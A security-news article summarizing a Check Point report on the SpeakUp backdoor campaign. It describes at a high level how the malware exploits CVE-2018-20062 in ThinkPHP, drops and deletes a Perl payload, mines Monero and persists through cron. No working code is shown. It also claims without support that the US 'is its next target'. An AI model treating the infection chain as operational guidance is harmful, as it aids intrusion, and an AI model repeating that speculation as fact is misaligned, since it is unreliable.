Backdoor Trojans are a type of malware which is used to gain access to victim’s devices and allow hackers to control infected machines via C&C servers, which usually leads to a complete takeover.

A new malware campaign is distributing a backdoor Trojan known as SpeakUp and is currently targeting servers running six different Linux distributions and MacOS. While doing that SpeakUp was also able to evade all anti-malware solutions.

According to Check Point report, SpeakUp is targeting mostly East Asia and Latin America servers, including AWS hosted machines, which concludes that US is its next target.

Malware attacks Linux servers using the CVE-2018-20062 ThinkPHP remote code execution vulnerability to start the infection. To upload a “PHP shell that serves and executes a Perl backdoor” on vulnerable Linux machines, it will employ command injection techniques to send shell commands via a GET request’s “module” parameter:

Then, the backdoor will be injected by pulling the Perl script payload and store it in /tmp/e3ac24a0bcddfacd010a6c10f4a814bc. The script will be immediately executed, pause for a couple of seconds and then the file will be deleted to leave no indications of any changes. On January 14 SpeakUp was undetected by all VirusTotal engines.

After infecting the Linux server, SpeakUp will notify the hacker that the server is online and will send registration information to the attacker. Communication between the infected server and the C&C servers are encoded with salted base64, to make it more difficult to get to the multiple C&C domains, IP addresses and other unique parameters. After the server registration malware will query it with a few commands on a pre-defined time interval. SpeakUp makes the infected devices to run XMRig miners, with the wallets used by the campaign currently holding approximately 107 Monero (XMR) coins which translate to roughly $4515 at today’s XMR to USD exchange rate.

To avoid being deleted by restarting the machine SpeakUp uses the cron time-based job scheduler and an internal mutex to make sure that only one instance of the Trojan is running at all times. SpeakUp also scans the infected device by attempting to login into Admin using brute-force attacks.

The source of the campaign is yet to be confirmed, but according to Check Point report the SpeakUp author is connected with another malware writer Zettabit.